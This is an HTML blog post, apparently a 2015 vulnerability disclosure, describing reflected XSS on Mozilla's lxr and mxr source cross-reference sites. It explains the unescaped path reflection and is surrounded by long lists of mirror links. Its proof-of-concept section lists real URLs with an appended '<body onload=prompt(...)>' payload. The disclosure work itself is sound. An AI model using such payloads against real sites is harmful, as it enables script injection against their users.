<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://lists.openwall.net/full-disclosure/2014/10/16/2"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2014/10/16/2</span></a></div>
<div style="margin: 0px;">
<a href="http://www.tetraph.com/blog/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/blog/xss-vulnerability/new-york-times-xss</span></a></div>
<div style="margin: 0px;">
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1102"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1102</span></a></div>
<div style="margin: 0px;">
<a href="http://webcabinet.tumblr.com/post/121907302752/new-york-times-xss"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://webcabinet.tumblr.com/post/121907302752/new-york-times-xss</span></a></div>
<div style="margin: 0px;">
<a href="http://www.inzeed.com/kaleidoscope/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/xss-vulnerability/new-york-times-xss</span></a></div>
<div style="margin: 0px;">
<a href="https://progressive-comp.com/?l=full-disclosure&m=141343993908563&w=1"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://progressive-comp.com/?l=full-disclosure&m=141343993908563&w=1</span></a></div>
<div style="margin: 0px;">
<a href="http://webtech.lofter.com/post/1cd3e0d3_6f57c56"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://webtech.lofter.com/post/1cd3e0d3_6f57c56</span></a></div>
<div style="margin: 0px;">
<a href="http://tetraph.blog.163.com/blog/static/2346030512014101270479/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/2346030512014101270479/</span></a></div>
<div style="margin: 0px;">
<a href="https://vulnerabilitypost.wordpress.com/2014/11/01/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-before-2013-are-affected/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://vulnerabilitypost.wordpress.com/2014/11/01/new-york-times-xss</span></a></div>
<div style="margin: 0px;">
<a href="http://lifegrey.tumblr.com/post/121912534859/tous-les-liens-vers-les-articles-du-new-york-times"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lifegrey.tumblr.com/post/121912534859/tous-les-liens-vers-les-articles</span></a></div>
<div style="margin: 0px;">
<a href="http://securityrelated.blogspot.com/2014/10/new-york-times-nytimescom-page-design.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2014/10/new-york-times-design.html</span></a></div>
<div style="margin: 0px;">
<a href="https://mathfas.wordpress.com/2014/11/01/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-before-2013-are-affected/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://mathfas.wordpress.com/2014/11/01/new-york-times-xss</span></a></div>
<div style="margin: 0px;">
<a href="http://computerobsess.blogspot.com/2014/10/new-york-times-nytimescom-page-design.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://computerobsess.blogspot.com/2014/10/new-york-times-design.html</span></a></div>
<div style="margin: 0px;">
<a href="http://whitehatview.tumblr.com/post/103788276286/urls-to-articles-in-new-york-times-nyt-published"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://whitehatview.tumblr.com/post/103788276286/urls-to-articles-xss</span></a></div>
<div style="margin: 0px;">
<a href="http://diebiyi.com/articles/security/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/xss-vulnerability/new-york-times-xss</span></a></div>
</div>
Posted 2015-06-20.<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Mozilla Online Website Two Sub-Domains XSS (Cross-site Scripting) Bugs ( All URLs Under the Two Domains)</b></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b>Domains:</b></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">http://lxr.mozilla.org/</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">http://mxr.mozilla.org/</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">(The two domains above are almost the same)</span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b>Websites information:</b></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">"lxr.mozilla.org, mxr.mozilla.org are cross references designed to display the Mozilla source code. The sources displayed are those that are currently checked in to the mainline of the mozilla.org CVS server, Mercurial Server, and Subversion Server; these pages are updated many times a day, so they should be pretty close to the latest-and-greatest." (from Mozilla)</span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br />"Mozilla is a free-software community which produces the Firefox web browser. The Mozilla community uses, develops, spreads and supports Mozilla products, thereby promoting exclusively free software and open standards, with only minor exceptions. The community is supported institutionally by the Mozilla Foundation and its tax-paying subsidiary, the Mozilla Corporation. In addition to the Firefox browser, Mozilla also produces Thunderbird, Firefox Mobile, the Firefox OS mobile operating system, the bug tracking system Bugzilla and a number of other projects." (Wikipedia)</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b>(1) Vulnerability description:</b></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="background-color: white; line-height: 19.6px; text-align: justify;">The Mozilla website has a security problem: it can be attacked through XSS bugs. Here is a description of XSS: "Hackers are constantly experimenting with a wide repertoire of hacking techniques to compromise websites and web applications and make off with a treasure trove of sensitive data including credit card numbers, social security numbers and even medical records. Cross-site Scripting (also known as XSS or CSS) is generally believed to be one of the most common application layer hacking techniques. Cross-site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually formatted as a hyperlink containing malicious content and which is distributed over any possible means on the internet." (Acunetix)</span></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">All pages under the following two URLs are vulnerable.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">http://lxr.mozilla.org/mozilla-central/source</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">http://mxr.mozilla.org/mozilla-central/source</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">This means all URLs under the above two domains can be used for XSS attacks targeting Mozilla's users.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">Since there are a large number of pages under them, and the contents of the two domains vary, the vulnerability is very dangerous: attackers can use different URLs to craft XSS attacks aimed at Mozilla's different classes of users.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOP5L1EdUMs9gLZPu92fxGB4Ij_U3rs8liSFPHMS1NFi5zYZ9JRzRurqxzMmaxMQ4I2CFFuha7wtfkCnVM03NUkc2FCQChL2E8r1C9zIicqAX2lU9ZBadjgheLZd8Qcs2uixZs3JP8VCQ/s1600/mozilla_lxr_2_xss.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOP5L1EdUMs9gLZPu92fxGB4Ij_U3rs8liSFPHMS1NFi5zYZ9JRzRurqxzMmaxMQ4I2CFFuha7wtfkCnVM03NUkc2FCQChL2E8r1C9zIicqAX2lU9ZBadjgheLZd8Qcs2uixZs3JP8VCQ/s1600/mozilla_lxr_2_xss.png" style="cursor: move;" width="400" /></span></a></span></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZD_C5WvoPiR9x-NF9ZYa8Ii2JYBzLx1S0Z-DvtCjs35ZrDBhEgRPxUjXy0iK_w-owRh8Y6zSCjwNesTEoeD4UUrJncnb7CMjU6xvBXacupHu3g1XeUo5Wj346vRhk0oxFp61QDmkPLc0/s1600/mozilla_mxr_1_xss.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZD_C5WvoPiR9x-NF9ZYa8Ii2JYBzLx1S0Z-DvtCjs35ZrDBhEgRPxUjXy0iK_w-owRh8Y6zSCjwNesTEoeD4UUrJncnb7CMjU6xvBXacupHu3g1XeUo5Wj346vRhk0oxFp61QDmkPLc0/s1600/mozilla_mxr_1_xss.png" style="cursor: move;" width="400" /></span></a></span></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Codes:</b></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://lxr.mozilla.org/mozilla-central/source/" href="http://lxr.mozilla.org/mozilla-central/source/" target="_blank">http://lxr.mozilla.org/mozilla-central/source/</a><body onload=prompt("justqdjing")></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://lxr.mozilla.org/mozilla-central/source/mobile/android/" href="http://lxr.mozilla.org/mozilla-central/source/mobile/android/" target="_blank">http://lxr.mozilla.org/mozilla-central/source/mobile/android/</a><body onload=prompt("justqdjing")></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://lxr.mozilla.org/mozilla-central/source/Android.mk/" href="http://lxr.mozilla.org/mozilla-central/source/Android.mk/" target="_blank">http://lxr.mozilla.org/mozilla-central/source/Android.mk/</a><body onload=prompt("tetraph")></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/" href="http://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/" target="_blank">http://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/</a><body onload=prompt("tetraph")></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cpp" href="http://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cpp" target="_blank">http://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cpp</a><body onload=prompt("tetraph")></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://mxr.mozilla.org/mozilla-central/source/" href="http://mxr.mozilla.org/mozilla-central/source/" target="_blank">http://mxr.mozilla.org/mozilla-central/source/</a><body onload=prompt("justqdjing")></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://mxr.mozilla.org/mozilla-central/source/webapprt/" href="http://mxr.mozilla.org/mozilla-central/source/webapprt/" target="_blank">http://mxr.mozilla.org/mozilla-central/source/webapprt/</a><body onload=prompt("justqdjing")></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/" href="http://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/" target="_blank">http://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/</a><body onload=prompt("justqdjing")></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/" href="http://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/" target="_blank">http://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/</a><body onload=prompt("tetraph")></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/" href="http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/" target="_blank">http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/</a><body onload=prompt("tetraph")></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Video:</b></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://www.youtube.com/watch?v=onA5BgC3zIY"><span style="color: black;">https://www.youtube.com/watch?v=onA5BgC3zIY</span></a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>(2) Vulnerability Analysis:</b></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">Take the following link as an example,</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">http://lxr.mozilla.org/mozilla-central/source/chrome/<attacktest></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">The reflected page contains the following markup:</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="/mozilla-central/source/chrome/%253Cattacktest%253E"></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><attacktest></attacktest></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"></a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">The requested path segment is reflected twice: percent-encoded inside the href (shown double-encoded as %253Cattacktest%253E), but unescaped as the link text. Replacing <attacktest> in the URL with "<body onload=prompt("justqdjing")>" therefore puts live markup into the page, and the script executes.</span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">The vulnerability can be exploited without a user login. Tests were performed on Firefox (26.0) on Ubuntu (12.04) and IE (9.0.15) on Windows 7.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b>(3) Vulnerability Disclosure:</b></span></span></div>
<div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">The vulnerability has been reported to bugzilla.mozilla.org. Mozilla is dealing with this issue.</span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">Discovered and Reported by:</span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/558912321821499392">@justqdjing</a>)</span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/wangjing/" target="_blank">http://www.tetraph.com/wangjing/</a></span></span></div>
</div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><br /><br /></span></div>
<div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span><span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><b>More Details:</b></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://lists.openwall.net/full-disclosure/2014/10/20/8" data-mce-style="color: #000000;" href="http://lists.openwall.net/full-disclosure/2014/10/20/8" style="color: black;">http://lists.openwall.net/full-disclosure/2014/10/20/8</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=141378783804463&w=2" data-mce-style="color: #000000;" href="http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=141378783804463&w=2" style="color: black;">http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://seclists.org/fulldisclosure/2014/Oct/92" data-mce-style="color: #000000;" href="http://seclists.org/fulldisclosure/2014/Oct/92" style="color: black;">http://seclists.org/fulldisclosure/2014/Oct/92</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" data-mce-style="color: #000000;" href="http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" style="color: black;" target="_blank">http://www.tetraph.com/blog/xss-vulnerability/mozilla-xss</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://whitehatview.tumblr.com/post/101466861221/mozilla-mozilla-org-two-sub-domains-cross" data-mce-style="color: #000000;" href="http://whitehatview.tumblr.com/post/101466861221/mozilla-mozilla-org-two-sub-domains-cross" style="color: black;">http://whitehatview.tumblr.com/post/101466861221/mozilla-mozilla</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://tetraph.blog.163.com/blog/static/2346030512014101115642885/" data-mce-style="color: #000000;" href="http://tetraph.blog.163.com/blog/static/2346030512014101115642885/" style="color: black;">http://tetraph.blog.163.com/blog/static/2346030512014101115642885/</a></span><span data-mce-style="color: #000000;"><br /></span><span data-mce-style="color: #000000;"><a data-mce-href="http://computerobsess.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html" data-mce-style="color: #000000;" href="http://computerobsess.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html" style="color: black;">http://computerobsess.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="https://tetraph.wordpress.com/2014/11/26/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains-2/" data-mce-style="color: #000000;" href="https://tetraph.wordpress.com/2014/11/26/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains-2/" style="color: black;">https://tetraph.wordpress.com/2014/11/26/mozilla-two-sub-domains-xss</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://tetraph.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html" data-mce-style="color: #000000;" href="http://tetraph.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html" style="color: black;">http://tetraph.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://itsecurity.lofter.com/post/1cfbf9e7_54fc68f" data-mce-style="color: #000000;" href="http://itsecurity.lofter.com/post/1cfbf9e7_54fc68f" style="color: black;">http://itsecurity.lofter.com/post/1cfbf9e7_54fc68f</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://whitehatview.tumblr.com/post/103540568486/two-of-mozillas-cross-reference-sub-domains" data-mce-style="color: #000000;" href="http://whitehatview.tumblr.com/post/103540568486/two-of-mozillas-cross-reference-sub-domains" style="color: black;">http://whitehatview.tumblr.com/post/103540568486/two-of-mozillas-cross</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://diebiyi.com/articles/security/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" data-mce-style="color: #000000;" href="http://diebiyi.com/articles/security/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" style="color: black;">http://diebiyi.com/articles/security/xss-vulnerability/mozilla-xss</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a data-mce-href="http://www.inzeed.com/kaleidoscope/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" data-mce-style="color: #000000;" href="http://www.inzeed.com/kaleidoscope/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" style="color: black;">http://www.inzeed.com/kaleidoscope/xss-vulnerability/mozilla-xss</a></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="https://mathfas.wordpress.com/2014/11/01/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" data-mce-style="color: #000000;" href="https://mathfas.wordpress.com/2014/11/01/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" style="color: black;">https://mathfas.wordpress.com/2014/11/01/mozilla-xss</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
